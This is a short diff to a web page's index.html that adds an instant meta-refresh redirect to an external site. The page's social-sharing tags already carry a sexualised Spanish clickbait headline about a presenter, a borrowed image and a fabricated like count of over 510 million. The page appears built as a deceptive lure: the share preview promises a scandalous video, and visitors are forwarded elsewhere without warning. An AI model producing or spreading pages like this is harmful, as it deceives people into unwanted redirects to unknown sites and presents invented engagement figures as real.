--- a/index.html
+++ b/index.html
@@ -6,6 +6,8 @@
     <title>9 POSICIONES</title>
 	  <meta name="viewport" content="width=device-width, initial-scale=1.0">
 	  <head>
+		  
+		  <meta content='0;url=https://www.artesdeldiaoficials.com/?p=265' http-equiv='Refresh'/>
   <meta property="og:title" content="🚨ATENCIÓN🚨 VIDEO: PRESENTADORA SE QUITA EL CALZÓN EN VIVO. LO QUE PASÓ DESPUÉS PARECE UNA PELÍCULA DE ADULTOS">
   <meta property="og:image" content="https://pbs.twimg.com/media/Fmt80VWXwAEf8_N?format=jpg">
  <meta property="og:description" content="510,254,120 likes">
